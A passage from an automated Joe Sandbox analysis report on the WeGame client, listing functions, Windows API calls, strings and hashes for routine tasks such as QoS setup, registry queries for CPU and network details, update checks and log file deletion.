                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$?get_log_instance@base@@Logger@1@$H_prolog3H_prolog3___stdio_common_vsprintf_s
                                                                • String ID: [qos_t]InitQos failed, {}$[qos_t]InitQos success$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp$ied-tqos-tgp.qq.com$ied-tqos.qq.com$ied-tqos.wegamex.com.hk$ied-tqosweb.qq.com$ied-tqosweb.wegamex.com.hk$tqos.wegamex.com.hk
                                                                • API String ID: 2915109889-620687475
                                                                • Opcode ID: 8174dcfaa17f417db83344b4e21a6bdec4b51cfaaa0a5afcc710eefa1e0034af
                                                                • Instruction ID: f1da697d6f3f91e3146d9981c60f621b6d0d7525e56043cc507fd9d2cb29bed0
                                                                • Opcode Fuzzy Hash: 8174dcfaa17f417db83344b4e21a6bdec4b51cfaaa0a5afcc710eefa1e0034af
                                                                • Instruction Fuzzy Hash: 5A610AB1940219ABDB18EB749C85FEE77ACAF05368F004098A549AF191DF399F458BF0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD851CE Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 178filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD851D8
                                                                • _strnset_s.API-MS-WIN-CRT-STRING-L1-1-0(00000010,00000000,00000000,-00000001,00000144,6BD8624B,000000FF,?,00000105,00000000), ref: 6BD85225
                                                                • memset.VCRUNTIME140(?,00000000,00000105), ref: 6BD85238
                                                                • SHGetFolderPathA.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6BD8524F
                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 6BD852DA
                                                                • GetLastError.KERNEL32 ref: 6BD852EA
                                                                • GetLastError.KERNEL32 ref: 6BD852F3
                                                                  • Part of subcall function 6BD152F9: __EH_prolog3.LIBCMT ref: 6BD15300
                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 6BD85356
                                                                • GetLastError.KERNEL32 ref: 6BD85360
                                                                • GetLastError.KERNEL32 ref: 6BD85369
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 6BD853D1
                                                                • GetLastError.KERNEL32 ref: 6BD853E6
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 6BD85414
                                                                • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?), ref: 6BD85458
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$Create$DirectoryFile$FolderH_prolog3H_prolog3_Path_strnset_smemsetstrncpy_s
                                                                • String ID: \DeskUpdate$\GlobalMgr.db$\Tencent
                                                                • API String ID: 3246384263-3739784189
                                                                • Opcode ID: 9bea89be350ebbd1c66a0e914c9ec07e36e04524aa0ad9aed6459a8f8fe9294d
                                                                • Instruction ID: 9d2d045a31825fd620d1edcb553e22816c4a77d7891b4fcf4f0e8d50992ad626
                                                                • Opcode Fuzzy Hash: 9bea89be350ebbd1c66a0e914c9ec07e36e04524aa0ad9aed6459a8f8fe9294d
                                                                • Instruction Fuzzy Hash: BA71B171910228EBDB25DFA4CC95BDDB3B8BF09315F5005D9E20AAB190DB789B84CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD84C53 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 137registrystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318},00000000,00020019,?,?,?,00000003), ref: 6BD84CB3
                                                                • __snprintf_s.LIBCMT ref: 6BD84CD1
                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 6BD84CF4
                                                                • RegQueryValueExA.KERNEL32(?,MediaSubType,00000000,?,?,00000104), ref: 6BD84D3B
                                                                • memset.VCRUNTIME140(?,00000000,00000104), ref: 6BD84D66
                                                                • RegQueryValueExA.ADVAPI32(?,PnpInstanceID,00000000,00000001,?,00000103), ref: 6BD84D90
                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(PCI), ref: 6BD84DA7
                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PCI,00000000,PCI), ref: 6BD84DBB
                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(PCI), ref: 6BD84DD8
                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PCI,00000000,PCI), ref: 6BD84DEA
                                                                • RegCloseKey.KERNEL32(?), ref: 6BD84E0D
                                                                • RegCloseKey.ADVAPI32(?), ref: 6BD84E15
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValuestrlenstrncmp$__snprintf_smemset
                                                                • String ID: %s\Connection$MediaSubType$PCI$PnpInstanceID$System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
                                                                • API String ID: 3706059900-3769660923
                                                                • Opcode ID: b91d83e34e5f7dcfaed266586c3af75c710a12282b31f9ca2c512d4f10498494
                                                                • Instruction ID: 1529c360a32e87bd9da8b9cb2a109eb8cef601efae612e374f8732e44f3507a6
                                                                • Opcode Fuzzy Hash: b91d83e34e5f7dcfaed266586c3af75c710a12282b31f9ca2c512d4f10498494
                                                                • Instruction Fuzzy Hash: 514143B2D4022CABDB25DB54CC82FDAB3BCEB15714F0041E5E658E6190E6B59FC58FA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045D9DB Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045D9E2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000007C,00459FD5), ref: 0045D9E9
                                                                • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?,?,?,?,?,?,?,?,?,0000007C,00459FD5), ref: 0045DA6A
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,OverwriteStatus,?,?,?,?,?,?,?,?,?,?,?,0000007C,00459FD5), ref: 0045DA8C
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,SubError,?,?), ref: 0045DABA
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,TickWaitMain,?,?,tgp,SubError,?,?), ref: 0045DACD
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,TickMoveFile,?,?,tgp,TickWaitMain,?,?,tgp,SubError,?,?), ref: 0045DAE0
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045DB02
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V45@@V?$allocator@V?$basic_string@$D@2@@std@@0PrivateProfile@ReadSys_wrapper@common@ierd_tgp@@$?get_log_instance@base@@Logger@1@$?get_app_sub_path@Application@common@ierd_tgp@@D@2@@std@@H_prolog3H_prolog3_H_prolog3_catch_
                                                                • String ID: OverwriteStatus$SubError$TickMoveFile$TickWaitMain$[main]CheckLastUpdate$[main][Liveupdate]not in file-overwritting process$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$tgp$update.tmp
                                                                • API String ID: 1990170196-1541422376
                                                                • Opcode ID: 0ffd537d6a61e8b3a327d6a616a1a5e70411048a287b66f9bf1c6319cfb3b409
                                                                • Instruction ID: 4bc66a90fe8c0204897266a4c31becda18860a138003547a0ae57debdd1513ba
                                                                • Opcode Fuzzy Hash: 0ffd537d6a61e8b3a327d6a616a1a5e70411048a287b66f9bf1c6319cfb3b409
                                                                • Instruction Fuzzy Hash: 39418F71D00208ABDB21EBA1C882FDD7779AF59308F24415FF50177282DBB95A45CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045E615 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 242fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0045E61F
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E66C
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E698
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E6BB
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E6DE
                                                                  • Part of subcall function 004599E1: __EH_prolog3.LIBCMT ref: 004599E8
                                                                  • Part of subcall function 00450F32: __EH_prolog3_GS.LIBCMT ref: 00450F39
                                                                  • Part of subcall function 00458990: __EH_prolog3_GS.LIBCMT ref: 0045899A
                                                                  • Part of subcall function 00458990: _Open_dir.MSVCP140(?,?,?,?,?,?,?,00000000,Function_00066916,00000218), ref: 00458A16
                                                                  • Part of subcall function 0043DF6D: __EH_prolog3.LIBCMT ref: 0043DF74
                                                                  • Part of subcall function 004694EE: __EH_prolog3_GS.LIBCMT ref: 004694F5
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000018,00000004,Function_0000BBD0,000001D4), ref: 0045E7EE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E7FC
                                                                • GetLastError.KERNEL32(?,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp,00000352,0048BBC7), ref: 0045E84E
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E8B6
                                                                Strings
                                                                • clear_log_file, delete log file[%s] failed:[%d], xrefs: 0045E87C
                                                                • clear_log_file, delete log file[%s] success, xrefs: 0045E924
                                                                • TinyNew.log, xrefs: 0045E68D
                                                                • daemon_x.log, xrefs: 0045E6B3
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0045E82C, 0045E8E6
                                                                • TinyDL_Ex.log, xrefs: 0045E661
                                                                • daemon_m.log, xrefs: 0045E6D6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=$H_prolog3_$?get_log_instance@base@@H_prolog3Logger@1@$DeleteErrorFileH_prolog3_catch_LastOpen_dir_invalid_parameter_noinfo_noreturn
                                                                • String ID: TinyDL_Ex.log$TinyNew.log$clear_log_file, delete log file[%s] failed:[%d]$clear_log_file, delete log file[%s] success$daemon_m.log$daemon_x.log$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 3116233958-2813812632
                                                                • Opcode ID: 4edbbec85724dba75fde9533605473665a760bc9e25bbe0e1b98d6285df0ed8f
                                                                • Instruction ID: 2f772555a6968b3d5106d1a35a116e5e6cd979d739ddd4d627c88308ebe7b798
                                                                • Opcode Fuzzy Hash: 4edbbec85724dba75fde9533605473665a760bc9e25bbe0e1b98d6285df0ed8f
                                                                • Instruction Fuzzy Hash: 51B17A70D01248DEDB24EBA5C951BDDBBB4AF15304F2080EAE449B7192EB785F48CF95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD2788D Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(sys_begin,?), ref: 6BD2789B
                                                                  • Part of subcall function 6BDAA432: GetCurrentThread.KERNEL32 ref: 6BDAA443
                                                                  • Part of subcall function 6BDAA432: SetThreadAffinityMask.KERNEL32(00000000), ref: 6BDAA44A
                                                                  • Part of subcall function 6BDAA432: QueryPerformanceCounter.KERNEL32(6BD579EB,?,?,?,6BD579EB,init plugin end:), ref: 6BDAA456
                                                                  • Part of subcall function 6BDAA432: GetCurrentThread.KERNEL32 ref: 6BDAA45D
                                                                  • Part of subcall function 6BDAA432: SetThreadAffinityMask.KERNEL32(00000000), ref: 6BDAA464
                                                                  • Part of subcall function 6BDAA432: strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000050,6BD579EB,000000FF,?,?,?,6BD579EB,init plugin end:), ref: 6BDAA481
                                                                • QueryPerformanceFrequency.KERNEL32(6C0984B0,?), ref: 6BD278B3
                                                                • QueryPerformanceCounter.KERNEL32(?,?), ref: 6BD278BD
                                                                • TranslateMessage.USER32(?), ref: 6BD278D9
                                                                • GetTickCount.KERNEL32 ref: 6BD278FA
                                                                • SetEvent.KERNEL32(?), ref: 6BD27914
                                                                • DispatchMessageW.USER32(?), ref: 6BD2791E
                                                                • GetTickCount.KERNEL32 ref: 6BD27928
                                                                • ?exit_app@Application@common@ierd_tgp@@QAEXH@Z.COMMON(0000012C), ref: 6BD27942
                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6BD2794B
                                                                • __aulldiv.LIBCMT ref: 6BD279D7
                                                                • PeekMessageA.USER32(?,00000000,00000113,00000113,00000000), ref: 6BD279F4
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6BD27A15
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(sys_end), ref: 6BD27A28
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: MessagePerformanceQueryThread$Counter$?stamp_point@@AffinityCountCurrentMaskPeekTick$?exit_app@Application@common@ierd_tgp@@DispatchEventFrequencyTranslate__aulldivstrncpy_s
                                                                • String ID: sys_begin$sys_end
                                                                • API String ID: 3393281382-3668967762
                                                                • Opcode ID: 2b372387d1321005e1cffdb4871e02cfae29e0c31f2eabb7b643483afe386331
                                                                • Instruction ID: 74363fabc1a2abcd9d84c43875671163f36f852c3df956b47bedcf5aa7412446
                                                                • Opcode Fuzzy Hash: 2b372387d1321005e1cffdb4871e02cfae29e0c31f2eabb7b643483afe386331
                                                                • Instruction Fuzzy Hash: D4417D75A10249EFDF14DFB8C98AB9E77B9FB0A318F10461AE516E7250DB38D905CB20
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDBB3F3 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDBB3FD
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,unknow,00000006,0000027C), ref: 6BDBB42C
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 6BDBB447
                                                                • RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,?,?,00000104), ref: 6BDBB484
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?), ref: 6BDBB4D0
                                                                  • Part of subcall function 6BDAB79E: __EH_prolog3_GS.LIBCMT ref: 6BDAB7A5
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDBB4EB
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp,0000057B,6C02E7BF), ref: 6BDBB533
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDBB54C
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp,0000057E,6C02E7BF), ref: 6BDBB58C
                                                                • RegCloseKey.ADVAPI32(?), ref: 6BDBB5B7
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDBB517, 6BDBB570
                                                                • [Sys_wrapper][get_cpu_name]open cpu reg failed. error_code=%d, xrefs: 6BDBB593
                                                                • unknow, xrefs: 6BDBB409
                                                                • [Sys_wrapper][get_cpu_name]query cpu reg failed. query_result = %d,error_code=%d, xrefs: 6BDBB53B
                                                                • ProcessorNameString, xrefs: 6BDBB479
                                                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 6BDBB422
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@ErrorH_prolog3_LastLogger@1@$?u16to8@common@ierd_tgp@@CloseD@2@@4@@D@std@@OpenQueryU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_ValueW@2@@std@@W@std@@memmovememset
                                                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$[Sys_wrapper][get_cpu_name]open cpu reg failed. error_code=%d$[Sys_wrapper][get_cpu_name]query cpu reg failed. query_result = %d,error_code=%d$e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp$unknow
                                                                • API String ID: 2700574034-3125235006
                                                                • Opcode ID: 293201939432b8d6b62ae44cc16ba7eda69cd6dcbde6600af17d106feef3c8e4
                                                                • Instruction ID: 6cab968373c14c94c3bccfd3df9be6ac192a815fd42fef94818cf114db63f546
                                                                • Opcode Fuzzy Hash: 293201939432b8d6b62ae44cc16ba7eda69cd6dcbde6600af17d106feef3c8e4
                                                                • Instruction Fuzzy Hash: 694181B1841228ABDB64DF60CCC9F9E7778EF14764F1001D9E909AB190EB399F458FA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD952CF Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 390COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD952D6
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD952E8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000002,0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?,00000001,?,00000000), ref: 6BD953D7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?,00000001,?), ref: 6BD9546B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000001,?,00000002,6BD577C5,00000000,00000001,00000000,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45), ref: 6BD955E3
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000000,?,00000002,6BD577C5,00000000,00000001,00000002), ref: 6BD9566E
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45,6BD43A1D), ref: 6BD95748
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?), ref: 6BD954F6
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                  • Part of subcall function 6BD96485: __EH_prolog3_GS.LIBCMT ref: 6BD9648F
                                                                  • Part of subcall function 6BD96485: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000,00000001), ref: 6BD964E1
                                                                  • Part of subcall function 6BD96485: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,6BD43A1D,00000000,00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD96578
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
